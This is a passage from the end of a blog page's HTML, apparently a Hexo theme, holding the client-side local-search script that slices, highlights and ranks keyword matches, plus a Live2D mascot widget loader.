                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

  

  

  

  

  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/kesyoban.model.json"},"display":{"position":"right","width":200,"height":250},"mobile":{"show":true},"log":false});</script></body>
</html>
